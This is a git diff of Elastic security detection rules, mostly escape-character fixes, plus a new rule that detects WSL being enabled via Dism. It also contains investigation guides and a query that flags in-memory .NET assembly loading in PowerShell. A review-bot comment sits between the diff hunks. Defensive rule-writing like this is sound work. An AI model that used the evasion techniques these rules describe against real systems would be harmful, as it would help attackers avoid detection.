start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not \n powershell.file.script_block_text : (\n (\"CommonWorkflowParameters\" or \"RelatedLinksHelpInfo\") and\n \"HelpDisplayStrings\"\n ) and not \n (powershell.file.script_block_text :\n (\"Get-SolutionFiles\" or \"Get-VisualStudio\" or \"Select-MSBuildPath\") and\n not file.name : \"PathFunctions.ps1\"\n )\n and not user.id : \"S-1-5-18\"\n", "references": [ "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" 
@@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_105.json b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_105.json index e6461b8356f..ba34a155aeb 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_105.json 
@@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_106.json b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_106.json index 3a665981ba8..f4a8774c10d 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_106.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_107.json b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_107.json index fbd06122d02..688b1c73dc0 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_107.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_208.json b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_208.json index 7b3baeb0013..3fd373f9b56 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_208.json +++ b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_208.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_1.json b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_1.json index 6280f3b737b..98e6e17f9f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_1.json @@ -45,7 +45,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_2.json b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_2.json index c0ad74f9373..e6cca08dd42 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_2.json 
@@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_2.json b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_2.json index 1a9f9ae9362..f6c2ced1dd3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_2.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_3.json b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_3.json index 8c77da6864d..56a268e8216 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_3.json +++ b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_3.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_4.json b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_4.json index 456b2e40940..c53c1497426 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_4.json +++ b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_4.json 
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_5.json b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_5.json
new file mode 100644
index 00000000000..cb364ed4fb9
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_5.json
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to enable the Windows Subsystem for Linux using Microsoft Dism utility. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Subsystem for Linux Enabled via Dism Utility", + "note": "## Triage and analysis\n\n### Investigating Windows Subsystem for Linux Enabled via Dism Utility\n\nThe Windows Subsystem for Linux (WSL) lets developers install a Linux distribution (such as Ubuntu, OpenSUSE, Kali, Debian, Arch Linux, etc) and use Linux applications, utilities, and Bash command-line tools directly on Windows, unmodified, without the overhead of a traditional virtual machine or dualboot setup. Attackers may abuse WSL to avoid security protections on a Windows host and perform a wide range of attacks.\n\nThis rule identifies attempts to enable WSL using the Dism utility. It monitors for the execution of Dism and checks if the command line contains the string \"Microsoft-Windows-Subsystem-Linux\". \n\n### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. 
Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and WSL is homologated and approved in the environment.\n\n### Related Rules\n\n- Execution via Windows Subsystem for Linux - db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd\n- Suspicious Execution via Windows Subsystem for Linux - 3e0eeb75-16e8-4f2f-9826-62461ca128b7\n- Host Files System Changes via Windows Subsystem for Linux - e88d1fe9-b2f4-48d4-bace-a026dc745d4b\n- Windows Subsystem for Linux Distribution Installed - a1699af0-8e1e-4ed0-8ec1-89783538a061\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type : \"start\" and\n (process.name : \"Dism.exe\" or process.pe.original_file_name == \"DISM.EXE\") and \n process.command_line : \"*Microsoft-Windows-Subsystem-Linux*\"\n", + "references": [ + "https://blog.f-secure.com/hunting-for-windows-subsystem-for-linux/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2e0537d-7d8f-4910-a11d-559bcf61295a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": 
"e2e0537d-7d8f-4910-a11d-559bcf61295a_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_104.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_104.json index 0dfefa078a0..9f53039c61e 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_105.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_105.json index 9eb75a990e9..4f58b85ecd9 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_105.json 
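Review bot: The new rule sets `"timestamp_override": "event.ingested"` and indexes `winlogbeat-*`, yet it has no `setup` field, while the e2f9fdf5 rules in this same release carry the caveat that non-elastic-agent indices on versions before 8.2 do not populate `event.ingested` and need a custom ingest pipeline; the same `setup` text should be added here so operators on beats indices know why the rule would never fire. The investigation guide also uses `### Related Rules` and `### Response and Remediation`, whereas the other guides on this page use `### Related rules` and `### Response and remediation`, and the sentence ending `"Microsoft-Windows-Subsystem-Linux". ` has a trailing space before the newline. In the query, `process.pe.original_file_name == "DISM.EXE"` uses the case-sensitive operator next to the case-insensitive `process.name : "Dism.exe"`; if that mix is not deliberate, `process.pe.original_file_name : "DISM.EXE"` would match the style of the neighbouring clause.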
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_106.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_106.json index b9e3e1c338f..6097c2b3ac6 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_106.json 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_107.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_107.json index 6de200bf88a..3d202b1417a 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_107.json 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_108.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_108.json index 1e71286e093..cbf9cae921c 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_108.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_108.json 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_109.json b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_109.json index cb437cc4180..c85ad2dfaef 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_109.json +++ b/packages/security_detection_engine/kibana/security_rule/e2f9fdf5-8076-45ad-9427-41e0e03dc9c2_109.json 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "e2f9fdf5-8076-45ad-9427-41e0e03dc9c2", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_103.json b/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_103.json index 91873e82a18..982851e6936 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e2fb5b18-e33c-4270-851e-c3d675c9afcd_103.json 
